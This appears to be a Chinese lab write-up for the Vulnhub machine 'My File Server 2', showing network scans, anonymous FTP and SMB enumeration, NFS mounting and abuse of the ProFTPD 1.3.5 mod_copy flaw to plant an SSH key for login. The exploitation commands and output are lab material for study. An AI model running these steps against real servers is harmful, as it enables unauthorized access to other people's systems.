My File Server 2
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ sudo netdiscover -i eth1
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:3b:85:70 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.104 08:00:27:30:9f:c5 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover软件识别目标主机的IP地址为192.168.56.104
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.104 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 07:03 EST
Nmap scan report for bogon (192.168.56.104)
Host is up (0.00028s latency).
Not shown: 64447 filtered tcp ports (no-response), 76 filtered tcp ports (host-prohibited), 1004 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.137
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
|_http-title: My File Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 50985/tcp6 nlockmgr
| 100021 1,3,4 51919/udp nlockmgr
| 100021 1,3,4 57831/udp6 nlockmgr
| 100021 1,3,4 58961/tcp nlockmgr
| 100024 1 35370/udp6 status
| 100024 1 36366/tcp status
| 100024 1 38658/udp status
| 100024 1 60484/tcp6 status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:30:9F:C5 (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: Unix
Host script results:
| smb2-time:
| date: 2022-11-09T12:04:32
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2022-11-09T17:34:34+05:30
|_clock-skew: mean: -1h50m01s, deviation: 3h10m30s, median: -2s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.09 seconds
Get Access
逐个对NMAP扫描所发现的端口进行信息收集。
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ ftp 192.168.56.104
Connected to 192.168.56.104.
220 (vsFTPd 3.0.2)
Name (192.168.56.104:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5708|).
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 16 Feb 18 2020 .
drwxr-xr-x 3 0 0 16 Feb 18 2020 ..
drwxrwxrwx 3 0 0 16 Feb 19 2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5615|).
150 Here comes the directory listing.
drwxrwxrwx 3 0 0 16 Feb 19 2020 .
drwxr-xr-x 3 0 0 16 Feb 18 2020 ..
drwxr-xr-x 9 0 0 4096 Feb 19 2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5228|).
150 Here comes the directory listing.
drwxr-xr-x 9 0 0 4096 Feb 19 2020 .
drwxrwxrwx 3 0 0 16 Feb 19 2020 ..
drwxr-xr-x 2 0 0 4096 Feb 19 2020 anaconda
drwxr-x--- 2 0 0 22 Feb 19 2020 audit
-rw-r--r-- 1 0 0 7033 Feb 19 2020 boot.log
-rw------- 1 0 0 10752 Feb 19 2020 btmp
-rw-r--r-- 1 0 0 9161 Feb 19 2020 cron
-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg
-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg.old
drwxr-xr-x 2 0 0 6 Feb 19 2020 glusterfs
drwx------ 2 0 0 39 Feb 19 2020 httpd
-rw-r--r-- 1 0 0 292584 Feb 19 2020 lastlog
-rw------- 1 0 0 3764 Feb 19 2020 maillog
-rw------- 1 0 0 1423423 Feb 19 2020 messages
drwx------ 2 0 0 6 Feb 19 2020 ppp
drwx------ 4 0 0 43 Feb 19 2020 samba
-rw------- 1 0 0 63142 Feb 19 2020 secure
-rw------- 1 0 0 0 Feb 19 2020 spooler
-rw------- 1 0 0 0 Feb 19 2020 tallylog
drwxr-xr-x 2 0 0 22 Feb 19 2020 tuned
-rw-r--r-- 1 0 0 58752 Feb 19 2020 wtmp
-rw------- 1 0 0 100 Feb 19 2020 xferlog
-rw------- 1 0 0 18076 Feb 19 2020 yum.log
226 Directory send OK.
ftp> cd audit
550 Failed to change directory.
ftp> cd audit
550 Failed to change directory.
ftp> get dmesg
local: dmesg remote: dmesg
229 Entering Extended Passive Mode (|||5558|).
150 Opening BINARY mode data connection for dmesg (31971 bytes).
100% |*********************************************************************************************************************************************************************************| 31971 31.56 MiB/s 00:00 ETA
226 Transfer complete.
31971 bytes received in 00:00 (18.01 MiB/s)
ftp> get messages
local: messages remote: messages
229 Entering Extended Passive Mode (|||5930|).
550 Failed to open file.
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ smbclient -L 192.168.56.104
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbdata Disk smbdata
smbuser Disk smbuser
IPC$ IPC IPC Service (Samba 4.9.1)
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.104 failed (Error NT_STATUS_HOST_UNREACHABLE)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Feb 21 01:50:09 2020
.. D 0 Tue Feb 18 06:47:54 2020
anaconda D 0 Tue Feb 18 06:48:15 2020
audit D 0 Tue Feb 18 06:48:15 2020
boot.log N 6120 Tue Feb 18 06:48:16 2020
btmp N 384 Tue Feb 18 06:48:16 2020
cron N 4813 Tue Feb 18 06:48:16 2020
dmesg N 31389 Tue Feb 18 06:48:16 2020
dmesg.old N 31389 Tue Feb 18 06:48:16 2020
glusterfs D 0 Tue Feb 18 06:48:16 2020
lastlog N 292292 Tue Feb 18 06:48:16 2020
maillog N 1982 Tue Feb 18 06:48:16 2020
messages N 684379 Tue Feb 18 06:48:17 2020
ppp D 0 Tue Feb 18 06:48:17 2020
samba D 0 Tue Feb 18 06:48:17 2020
secure N 11937 Tue Feb 18 06:48:17 2020
spooler N 0 Tue Feb 18 06:48:17 2020
tallylog N 0 Tue Feb 18 06:48:17 2020
tuned D 0 Tue Feb 18 06:48:17 2020
wtmp N 25728 Tue Feb 18 06:48:17 2020
xferlog N 100 Tue Feb 18 06:48:17 2020
yum.log N 10915 Tue Feb 18 06:48:17 2020
sshd_config N 3906 Wed Feb 19 02:46:38 2020
authorized_keys A 389 Fri Feb 21 01:50:09 2020
19976192 blocks of size 1024. 18285224 blocks available
smb: \> cd sshd_config
cd \sshd_config\: NT_STATUS_NOT_A_DIRECTORY
smb: \> get sshd_config
getting file \sshd_config of size 3906 as sshd_config (1907.1 KiloBytes/sec) (average 1907.2 KiloBytes/sec)
smb: \> quit
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ smbclient //192.168.56.104/smbuser
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ ftp 192.168.56.104 -P 2121
Connected to 192.168.56.104.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
Name (192.168.56.104:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||19147|)
ftp: Can't connect to `192.168.56.104:19147': No route to host
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 root root 16 Feb 18 2020 .
drwxr-xr-x 3 root root 16 Feb 18 2020 ..
drwxrwxrwx 3 root root 16 Feb 19 2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls -alh
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx 3 root root 16 Feb 19 2020 .
drwxr-xr-x 3 root root 16 Feb 18 2020 ..
drwxr-xr-x 9 root root 4.0k Feb 19 2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 root root 4096 Feb 19 2020 anaconda
drwxr-x--- 2 root root 22 Feb 19 2020 audit
-rw-r--r-- 1 root root 7033 Feb 19 2020 boot.log
-rw------- 1 root root 10752 Feb 19 2020 btmp
-rw-r--r-- 1 root root 9161 Feb 19 2020 cron
-rw-r--r-- 1 root root 31971 Feb 19 2020 dmesg
-rw-r--r-- 1 root root 31971 Feb 19 2020 dmesg.old
drwxr-xr-x 2 root root 6 Feb 19 2020 glusterfs
drwx------ 2 root root 39 Feb 19 2020 httpd
-rw-r--r-- 1 root root 292584 Feb 19 2020 lastlog
-rw------- 1 root root 3764 Feb 19 2020 maillog
-rw------- 1 root root 1423423 Feb 19 2020 messages
drwx------ 2 root root 6 Feb 19 2020 ppp
drwx------ 4 root root 43 Feb 19 2020 samba
-rw------- 1 root root 63142 Feb 19 2020 secure
-rw------- 1 root root 0 Feb 19 2020 spooler
-rw------- 1 root root 0 Feb 19 2020 tallylog
drwxr-xr-x 2 root root 22 Feb 19 2020 tuned
-rw-r--r-- 1 root root 58752 Feb 19 2020 wtmp
-rw------- 1 root root 100 Feb 19 2020 xferlog
-rw------- 1 root root 18076 Feb 19 2020 yum.log
226 Transfer complete
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ searchsploit proftpd 1.3.5
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ gobuster dir -u http://192.168.56.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.104
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/11/09 07:25:30 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 174]
/.html (Status: 403) [Size: 207]
/readme.txt (Status: 200) [Size: 25]
/.html (Status: 403) [Size: 207]
Progress: 1101100 / 1102805 (99.85%)===============================================================
2022/11/09 07:27:46 Finished
===========================================================
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ curl http://192.168.56.104/readme.txt
My Password is
rootroot1
尝试SSH登录:
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ ssh root@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ED25519 key fingerprint is SHA256:ccn0TgE4/OXtSpg3oMO2gVNYXrps4Zi+XcBgaDZnW78.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.104' (ED25519) to the list of known hosts.
##############################################################################################
# Armour Infosec #
# --------- www.armourinfosec.com ------------ #
# My File Server - 2 #
# Designed By :- Akanksha Sachin Verma #
# Twitter :- @akankshavermasv #
##############################################################################################
root@192.168.56.104: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
只接受公私钥登录方式。
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ sudo nmap -sC -p 445 --script=smb-enum* 192.168.56.104
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 07:37 EST
Nmap scan report for bogon (192.168.56.104)
Host is up (0.00032s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:30:9F:C5 (Oracle VirtualBox virtual NIC)
Host script results:
| smb-enum-domains:
| FILESERVER
| Groups: n/a
| Users: smbuser
| Creation time: unknown
| Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
| Account lockout disabled
| Builtin
| Groups: n/a
| Users: n/a
| Creation time: unknown
| Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|_ Account lockout disabled
| smb-enum-users:
| FILESERVER\smbuser (RID: 1000)
| Full name:
| Description:
|_ Flags: Normal user account
| smb-enum-shares:
| account_used: <blank>
| \\192.168.56.104\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Samba 4.9.1)
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| \\192.168.56.104\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\drivers
| Anonymous access: <none>
| \\192.168.56.104\smbdata:
| Type: STYPE_DISKTREE
| Comment: smbdata
| Users: 0
| Max Users: <unlimited>
| Path: C:\smbdata
| Anonymous access: READ/WRITE
| \\192.168.56.104\smbuser:
| Type: STYPE_DISKTREE
| Comment: smbuser
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\smbuser\
|_ Anonymous access: <none>
| smb-enum-sessions:
|_ <nobody>
Nmap done: 1 IP address (1 host up) scanned in 300.33 seconds
目标主机2049端口开放,文件共享,看能否访问
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ mount -t nfs -o tcp,nolock 192.168.56.104:/smbdata /tmp/mnt
mount.nfs: failed to apply fstab options
发现挂载不上,用sudo 执行即可
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ sudo mount -t nfs 192.168.56.104:/smbdata tmp
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ cd /tmp
┌──(kali㉿kali)-[/tmp]
└─$ cd ~/Vulnhub/My_File_Server_2
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ ls
49908.py dmesg nmap_full_scan sshd_config tmp
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]
└─$ cd tmp
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ ls -alh
total 856K
drwxrwxrwx 8 root root 4.0K Nov 9 07:37 .
drwxr-xr-x 3 kali kali 4.0K Nov 9 07:49 ..
drwxrwxrwx 2 root root 4.0K Feb 18 2020 anaconda
drwxrwxrwx 2 root root 22 Feb 18 2020 audit
-rwxr--r-- 1 99 99 389 Feb 21 2020 authorized_keys
-rwxrwxrwx 1 root root 6.0K Feb 18 2020 boot.log
-rwxrwxrwx 1 root root 384 Feb 18 2020 btmp
-rwxrwxrwx 1 root root 4.8K Feb 18 2020 cron
-rwxrwxrwx 1 root root 31K Feb 18 2020 dmesg
-rwxrwxrwx 1 root root 31K Feb 18 2020 dmesg.old
drwxrwxrwx 2 root root 6 Feb 18 2020 glusterfs
-rwxrwxrwx 1 root root 286K Feb 18 2020 lastlog
-rwxrwxrwx 1 root root 2.0K Feb 18 2020 maillog
-rwxrwxrwx 1 root root 669K Feb 18 2020 messages
drwxrwxrwx 2 root root 6 Feb 18 2020 ppp
drwxrwxrwx 4 root root 43 Feb 18 2020 samba
-rwxrwxrwx 1 root root 12K Feb 18 2020 secure
-rwxrwxrwx 1 root root 0 Feb 18 2020 spooler
-rw-r--r-- 1 99 99 3.9K Feb 19 2020 sshd_config
-rwxrwxrwx 1 root root 0 Feb 18 2020 tallylog
drwxrwxrwx 2 root root 22 Feb 18 2020 tuned
-rwxrwxrwx 1 root root 26K Feb 18 2020 wtmp
-rwxrwxrwx 1 root root 100 Feb 18 2020 xferlog
-rwxrwxrwx 1 root root 11K Feb 18 2020 yum.log
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$
接下来研究proftpd,1.3.5有文件拷贝漏洞
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ cp /home/kali/.ssh/id_rsa.pub tmp
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ telnet 192.168.56.104 2121
Trying 192.168.56.104...
Connected to 192.168.56.104.
Escape character is '^]'.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
help
214-The following commands are recognized (* =>'s unimplemented):
CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV
EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD
XRMD MKD XMKD PWD XPWD SIZE SYST HELP
NOOP FEAT OPTS AUTH* CCC* CONF* ENC* MIC*
PBSZ* PROT* TYPE STRU MODE RETR STOR STOU
APPE REST ABOR USER PASS ACCT* REIN* LIST
NLST STAT SITE MLSD MLST
214 Direct comments to root@localhost
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
CPFR <sp> pathname
CPTO <sp> pathname
HELP
CHGRP
CHMOD
214 Direct comments to root@localhost
site CPFR /smbdata/id_rsa.pub
550 /smbdata/id_rsa.pub: No such file or directory
site CPFR /smbdata/id_rsa.pub
350 File or directory exists, ready for destination name
site CPTO /home/smbuser/.ssh/authorized_keys
250 Copy successful
└─$ ls
anaconda audit authorized_keys boot.log btmp cron dmesg dmesg.old glusterfs lastlog maillog messages passwd_copy ppp samba secure spooler sshd_config tallylog tmp tuned wtmp xferlog yum.log
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ cp ~/.ssh/id_rsa.pub .
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ cp ~/.ssh/id_rsa .
┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2/tmp]
└─$ ssh -i id_rsa smbuser@192.168.56.104
##############################################################################################
# Armour Infosec #
# --------- www.armourinfosec.com ------------ #
# My File Server - 2 #
# Designed By :- Akanksha Sachin Verma #
# Twitter :- @akankshavermasv #
##############################################################################################
Last login: Fri Feb 21 12:39:36 2020
[smbuser@fileserver ~]$
提权
提权就很简单了,因为前面已经得到了root的密码。
原文地址:http://www.cnblogs.com/jason-huawen/p/16875212.html
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,请务用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员!
8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载
声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性